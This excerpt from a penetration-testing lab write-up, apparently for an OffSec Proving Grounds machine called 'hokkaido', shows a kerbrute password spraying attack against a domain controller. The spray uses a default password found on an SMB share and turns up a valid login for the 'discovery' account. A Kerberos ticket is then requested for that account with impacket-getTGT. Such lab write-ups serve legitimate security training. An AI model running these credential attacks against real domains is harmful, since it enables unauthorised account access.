Password Spraying Attack
A default password has been uncovered from one of the shares in the target SMB server; Start123!
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ kerbrute passwordspray --dc dc.hokkaido-aerospace.com -d HOKKAIDO-AEROSPACE.COM ./users.txt 'Start123!'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/25/25 - Ronnie Flathers @ropnop
2025/04/25 15:36:33 > Using KDC(s):
2025/04/25 15:36:33 > dc.hokkaido-aerospace.com:88
2025/04/25 15:36:33 > [+] VALID LOGIN: discovery@HOKKAIDO-AEROSPACE.COM:Start123!
2025/04/25 15:36:33 > Done! Tested 33 logins (1 successes) in 0.327 seconds
Conducting a password spraying attack with the uncovered password; Start123!
It belongs to the discovery
account
Validation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ impacket-getTGT HOKKAIDO-AEROSPACE.COM/discovery@dc.hokkaido-aerospace.com -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: Start123!
[*] Saving ticket in discovery@dc.hokkaido-aerospace.com.ccache
Validated
TGT generated for the discovery
account